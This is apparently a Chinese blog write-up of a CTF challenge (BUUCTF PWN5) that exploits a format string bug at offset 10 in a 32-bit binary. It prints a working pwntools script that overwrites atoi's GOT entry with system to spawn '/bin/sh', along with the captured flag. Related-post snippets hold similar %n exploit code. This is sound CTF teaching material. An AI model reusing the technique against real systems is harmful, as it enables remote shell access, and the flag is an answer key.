[buuctf][第五空间2019 决赛]PWN5

最新推荐文章于 2024-03-11 22:56:43 发布
最新推荐文章于 2024-03-11 22:56:43 发布
阅读量372 收藏 1
点赞数 1
分类专栏: PWN # buuctf 文章标签: 安全 c语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_71081503/article/details/125356047
版权
buuctf 同时被 2 个专栏收录
32 篇文章 0 订阅
订阅专栏
PWN
30 篇文章 2 订阅
订阅专栏

解题

解析

先checkesec一下,发现是一个32位和两个保护的。
在这里插入图片描述
进ida中查看。
在这里插入图片描述
主要的一个部分,之后输入your name的时候存在回显,那么可能是栈溢出,或者是格式化字符串吗,但是,buf的大小已经限制了多少,所以很有可能是格式化字符串,那么我们先进行格式一下,发现我们输入的位置是在第十位。
在这里插入图片描述
那么就可以开始写脚本了,知道了偏移是10,之后继续利用pwntools带的fmtstr_payload去写

脚本

from pwn import *
p = remote('node4.buuoj.cn',28725)
context(os = 'linux',arch = 'i386',log_level = 'debug')
#p = process('./pwn')
elf = ELF('pwn')
#出地址
got_atoi = elf.got['atoi']
plt_sys = elf.plt['system']
#payload
payload = fmtstr_payload(10,{got_atoi:plt_sys})
p.recv()
p.sendline(payload)
p.recv()
p.sendline(b'/bin/sh')
p.interactive()

在这里插入图片描述
最后flag是flag{6130affe-215c-4008-ac76-a8804b4f5ca1}

逆向萌新
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
ciscn-2019-pwn
11-29
1. baby_pwn2. bms3. daily4. Double5 your_pwn
buuctf——[第五空间2019 决赛]PWN51 利用格式化字符串漏
最新发布
2301_81505831的博客
03-15 369
首先,我们在终端上输入 ./pwn,然后利用AAAA %x %x %x %x %x %x %x %x %x %x %x %x %x的形式来计算偏移量:可以数出0x41414141是格式化字符串的第10个参数,之后只要修改dword_804c044的值,让输入和dword_804c044的值一样就可以了。打开靶机,下载文件,检查文件类型,可以看到是32位程序,开启了Canary保护,不能使用栈溢出。放进ida32位可以看到如下代码。最后的最后,附带一些参考博客。用gpt分析以上程序。最后我们便得出了代码。
[CTF][第五空间2019 决赛]PWN5 1
凉水的博客
12-09 1084
解题思路 反编译后的源码: srand(__seed); // 生成随机数 iVar1 = open("/dev/urandom",0); read(iVar1,&DAT_0804c044,4); printf("your name:"); // 读取输入 read(0,local_78,99); printf("Hello,"); // 打印输入 printf(local_78); printf("your passwd:"); read(0,loc
[第五空间2019 决赛]PWN51解题
2301_81504456的博客
03-11 488
主要格式化字符串漏洞利用,后面添加recvline及脚本编写说明仅为个人理解🌹🌹🌹(个人还是小白一枚)希望帮助理解,望大家多多指出错误及正确理解做法。
buuctf——[第五空间2019 决赛]PWN5 1
qq_41560595的博客
03-17 4209
查看文件权限 设置了canary,无法栈溢出。 F5查看源程序 源程序大意是把随机数放入到bss段的0x804c044处,用户输入用户名和密码,如果密码和随机数相等,则拿到权限。 解题思路 看到了printf,又加了canary权限,可以想到考查格式化字符串漏洞。可以更改0x804c044处的值,所以要精心构造一个合适的格式化字符串。构造的方法很多。 在用户输入用户名处,先输入一个AAAA,试探会写在栈的哪个位置。 “AAAA”写在了第10个位子。构造: bss=0x804c044 payload=b
buuctf [第五空间2019 决赛]PWN5 1 wp
qq_45895967的博客
07-20 561
from pwn import* io=remote(‘node4.buuoj.cn’,29463) addr=0x0804C044 payload=p32(addr) payload+=’%10$n’ io.sendlineafter(‘name:’,payload) payload=str(0x4) io.sendlineafter(‘passwd:’,payload) io.interactive()
[第五空间2019 决赛]PWN5 1
向安全进发的博客
05-19 1391
这样,我们可以先把0x804c044这个地址先写到偏移值为10的地址中,然后利用%10$n把4写入到这个地址中去,然后再将密码写为4就可以达到目的了。再看一下程序流程:如果nptr也就是输入的密码和0x804c044下的数字相同,则成功。先写入buf,随后又printf(buf),明显的格式化字符串漏洞。因此我们可以通过%n来修改0x804c044上的数达到自己的目的。A的ascll码为41,因此偏移值为10。32位程序,有canary。首先了解一下什么是%n。
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
2020年第五空间.zip
07-20
2020年第五空间 比赛逆向 pwn等赛题,除web题外所有赛题均有,含wp,麒麟系统wp。
buuctf pwn ubuntu20的自己搭建运行环境
11-15
pwn ubuntu20的自己搭建运行环境具体情参考https://blog.csdn.net/weixin_41748164/article/details/127874334
Pwn】fuzzerinstrospector(首届数字空间安全攻防大赛)
07-16
首届数字空间安全攻防大赛
BUUCTF Pwn [第五空间2019 决赛]PWN5
MrTreebook的博客
12-25 968
BUUCTF Pwn [第五空间2019 决赛]PWN51.题目下载地址2.checksec2.IDA分析4.exp 1.题目下载地址 点击下载 2.checksec 开启了canary 没有PIE 2.IDA分析 查看主函数,函数的功能是读入一个4位的随机密码,再将我们输入的密码与随机生成数比较,相同就执行system 这里面的printf()存在格式化字符串漏洞 1.利用 "AAAA %08x %08x %8x %08x %08x %08x %08x………… ",这样的字符串来找到我们输入
BUUCTF [第五空间2019 决赛]PWN5
m0_54262894的博客
10-27 204
先checksec,开启了NX保护和Canary保护 也就意味着不能用栈溢出来攻击了 运行一下 放入ida中 查看main函数 我们可以看到只要令atoi(nptr) == dword_804C044就可以拿到权限 但dword_804C044是随机的,所以我们需要将它修改为我们想要的数据 看到了printf(buf); 说明存在格式化字符串漏洞 先计算偏移 我们可以算出偏移为10(从AAAA到41414141) ...
[第五空间2019 决赛]PWN5
weixin_56301399的博客
07-21 1519
格式化字符串漏洞
BUUCTF|PWN-[第五空间2019 决赛]PWN5-WP
l2645470582_的博客
01-10 937
1.检查保护机制 (1)开启了金丝雀和堆栈保护 (2)该文件是32位的文件 2.用32位的IDA打开该文件 (1)F12查看关键字符串 (2)我们进入反编译代码看看,看到nptr=unk_804C044才能获取权限 (3)unk_804C044有4个字节 (4)printf(&buf);存在格式化字符串漏洞 (5)kali运行该文件,用%p看出偏移量为10,利用%10$n定位到这个位置 payload构造 payload = p32(0x804C044...
pwn】[第五空间2019 决赛]PWN5
ethan18的博客
07-13 231
函数的逻辑(就是上面那个伪代码),可以看出,主要是需要让我们的passwd输入值和从文件中输入的值保持相同,但是很明显我们根本就不知道这个。可以数出,0x41414141是格式化字符串的第10个参数,所以我们构造的时候就需要从。这是Buuctf的一道题,是我实战遇到的第一道格式字符串漏洞,在此记录。对于格式化字符串漏洞,我们首先要确定输入点是栈中的第几个参数。函数里面直接输入了地址,表明是有格式字符串漏洞的。,我们一个字节一个字节的存入,所以不能是直接用。,将输出的字符串的数量覆盖进所指向的位置。
buuctf pwn 第五空间决赛pwn5
09-28
buuctf pwn 第五空间决赛pwn5是一个CTF pwn题,它涉及到格式化字符串漏洞。格式化字符串漏洞是一种常见的安全漏洞,利用这个漏洞可以读取或修改程序的内存中的数据,从而导致程序行为异常或者攻击者获取敏感信息。在...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

逆向萌新

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值